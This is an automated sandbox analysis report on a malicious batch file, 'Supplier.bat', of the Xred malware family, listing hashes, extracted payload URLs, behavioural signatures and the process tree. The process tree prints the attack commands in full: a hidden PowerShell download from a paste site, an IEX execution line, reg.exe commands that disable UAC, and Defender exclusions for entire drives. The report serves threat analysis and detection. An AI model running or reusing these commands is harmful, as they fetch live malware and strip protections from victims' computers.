Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 10:30
Static task
static1
Behavioral task
behavioral1
Sample
Supplier.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Supplier.bat
Resource
win10v2004-20241007-en
General
-
Target
Supplier.bat
-
Size
41KB
-
MD5
b84568e632497dd5dc2f4ac9f08b783c
-
SHA1
a0a8e9493a356a2c495130da52c5b49c3d82685a
-
SHA256
b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
-
SHA512
e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
-
SSDEEP
96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0
Malware Config
Extracted
https://paste.fo/raw/cdfd23f3b9ad
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Xred family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 3648 powershell.exe -
pid Process 1292 powershell.exe 3648 powershell.exe 1720 powershell.exe 4004 powershell.exe 3940 powershell.exe 464 powershell.exe 904 powershell.exe 4896 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation DOCX.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk ._cache_DOCX.exe -
Executes dropped EXE 6 IoCs
pid Process 3412 DOCX.exe 1972 ._cache_DOCX.exe 4528 Synaptics.exe 1748 ._cache_Synaptics.exe 2184 XVZBZS.exe 5012 XVZBZS.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGWEKK = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\XVZBZS.exe\"" ._cache_DOCX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" DOCX.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 16 raw.githubusercontent.com 20 raw.githubusercontent.com 21 raw.githubusercontent.com 22 raw.githubusercontent.com -
AutoIT Executable 15 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/1748-376-0x0000000000460000-0x000000000065A000-memory.dmp autoit_exe behavioral2/memory/1972-393-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-394-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-399-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-401-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/2184-406-0x0000000000FA0000-0x000000000119A000-memory.dmp autoit_exe behavioral2/memory/1972-407-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-409-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-411-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-436-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-438-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-440-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/5012-443-0x0000000000FA0000-0x000000000119A000-memory.dmp autoit_exe behavioral2/memory/1972-444-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe behavioral2/memory/1972-446-0x0000000000510000-0x000000000070A000-memory.dmp autoit_exe -
resource yara_rule behavioral2/files/0x0007000000023cf3-178.dat upx behavioral2/memory/1972-238-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1748-369-0x0000000000460000-0x000000000065A000-memory.dmp upx behavioral2/memory/1748-376-0x0000000000460000-0x000000000065A000-memory.dmp upx behavioral2/memory/1972-393-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-394-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-399-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-401-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/2184-404-0x0000000000FA0000-0x000000000119A000-memory.dmp upx behavioral2/memory/2184-406-0x0000000000FA0000-0x000000000119A000-memory.dmp upx behavioral2/memory/1972-407-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-409-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-411-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-436-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-438-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-440-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/5012-443-0x0000000000FA0000-0x000000000119A000-memory.dmp upx behavioral2/memory/1972-444-0x0000000000510000-0x000000000070A000-memory.dmp upx behavioral2/memory/1972-446-0x0000000000510000-0x000000000070A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XVZBZS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOCX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_DOCX.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSCript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XVZBZS.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 4844 timeout.exe 4760 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 12 IoCs
pid Process 4240 taskkill.exe 2960 taskkill.exe 5072 taskkill.exe 3560 taskkill.exe 2212 taskkill.exe 1128 taskkill.exe 3584 taskkill.exe 2984 taskkill.exe 4696 taskkill.exe 2648 taskkill.exe 4988 taskkill.exe 5064 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ DOCX.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 5104 reg.exe 2248 reg.exe 4892 reg.exe 4804 reg.exe 1516 reg.exe 3668 reg.exe 4400 reg.exe 4280 reg.exe 2568 reg.exe 4728 reg.exe 3180 reg.exe 3308 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\SecurityCenter2 ._cache_DOCX.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 628 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4956 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3648 powershell.exe 3648 powershell.exe 1292 powershell.exe 1292 powershell.exe 1720 powershell.exe 1720 powershell.exe 4004 powershell.exe 4004 powershell.exe 2968 msedge.exe 2968 msedge.exe 3976 msedge.exe 3976 msedge.exe 3940 powershell.exe 3940 powershell.exe 3940 powershell.exe 464 powershell.exe 464 powershell.exe 464 powershell.exe 904 powershell.exe 904 powershell.exe 904 powershell.exe 4896 powershell.exe 4896 powershell.exe 4896 powershell.exe 4968 identity_helper.exe 4968 identity_helper.exe 1000 msedge.exe 1000 msedge.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe 1972 ._cache_DOCX.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1972 ._cache_DOCX.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3648 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 1720 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 464 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeRestorePrivilege 1392 7z.exe Token: 35 1392 7z.exe Token: SeSecurityPrivilege 1392 7z.exe Token: SeSecurityPrivilege 1392 7z.exe Token: SeDebugPrivilege 4240 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 3584 taskkill.exe Token: SeDebugPrivilege 2984 taskkill.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeDebugPrivilege 4696 taskkill.exe Token: SeDebugPrivilege 2648 taskkill.exe Token: SeDebugPrivilege 4988 taskkill.exe Token: SeDebugPrivilege 3560 taskkill.exe Token: SeDebugPrivilege 5064 taskkill.exe Token: SeDebugPrivilege 2212 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe -
Suspicious use of FindShellTrayWindow 47 IoCs
pid Process 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe 3976 msedge.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 4956 EXCEL.EXE 4956 EXCEL.EXE 4956 EXCEL.EXE 4956 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2624 wrote to memory of 4744 2624 cmd.exe 84 PID 2624 wrote to memory of 4744 2624 cmd.exe 84 PID 4744 wrote to memory of 3648 4744 cmd.exe 86 PID 4744 wrote to memory of 3648 4744 cmd.exe 86 PID 4744 wrote to memory of 1292 4744 cmd.exe 87 PID 4744 wrote to memory of 1292 4744 cmd.exe 87 PID 1292 wrote to memory of 2864 1292 powershell.exe 88 PID 1292 wrote to memory of 2864 1292 powershell.exe 88 PID 2864 wrote to memory of 4892 2864 cmd.exe 90 PID 2864 wrote to memory of 4892 2864 cmd.exe 90 PID 2864 wrote to memory of 4804 2864 cmd.exe 91 PID 2864 wrote to memory of 4804 2864 cmd.exe 91 PID 2864 wrote to memory of 1516 2864 cmd.exe 92 PID 2864 wrote to memory of 1516 2864 cmd.exe 92 PID 2864 wrote to memory of 4728 2864 cmd.exe 93 PID 2864 wrote to memory of 4728 2864 cmd.exe 93 PID 2864 wrote to memory of 3668 2864 cmd.exe 94 PID 2864 wrote to memory of 3668 2864 cmd.exe 94 PID 2864 wrote to memory of 2568 2864 cmd.exe 95 PID 2864 wrote to memory of 2568 2864 cmd.exe 95 PID 2864 wrote to memory of 3180 2864 cmd.exe 96 PID 2864 wrote to memory of 3180 2864 cmd.exe 96 PID 2864 wrote to memory of 5104 2864 cmd.exe 97 PID 2864 wrote to memory of 5104 2864 cmd.exe 97 PID 2864 wrote to memory of 3308 2864 cmd.exe 98 PID 2864 wrote to memory of 3308 2864 cmd.exe 98 PID 2864 wrote to memory of 4400 2864 cmd.exe 99 PID 2864 wrote to memory of 4400 2864 cmd.exe 99 PID 2864 wrote to memory of 4280 2864 cmd.exe 100 PID 2864 wrote to memory of 4280 2864 cmd.exe 100 PID 2864 wrote to memory of 2248 2864 cmd.exe 101 PID 2864 wrote to memory of 2248 2864 cmd.exe 101 PID 2864 wrote to memory of 1720 2864 cmd.exe 102 PID 2864 wrote to memory of 1720 2864 cmd.exe 102 PID 4744 wrote to memory of 3976 4744 cmd.exe 103 PID 4744 wrote to memory of 3976 4744 cmd.exe 103 PID 4744 wrote to memory of 4844 4744 cmd.exe 105 PID 4744 wrote to memory of 4844 4744 cmd.exe 105 PID 3976 wrote to memory of 3324 3976 msedge.exe 106 PID 3976 wrote to memory of 3324 3976 msedge.exe 106 PID 2864 wrote to memory of 4004 2864 cmd.exe 107 PID 2864 wrote to memory of 4004 2864 cmd.exe 107 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108 PID 3976 wrote to memory of 804 3976 msedge.exe 108
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Supplier.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:4892
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:4804
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1516
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4728
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3668
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2568
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3180
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:5104
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3308
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4400
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:4280
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4896
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd0c8046f8,0x7ffd0c804708,0x7ffd0c8047184⤵PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:24⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:2968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:84⤵PID:1180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:14⤵PID:2996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,17837379045743812158,9438410548914885631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:14⤵PID:4420
-
-
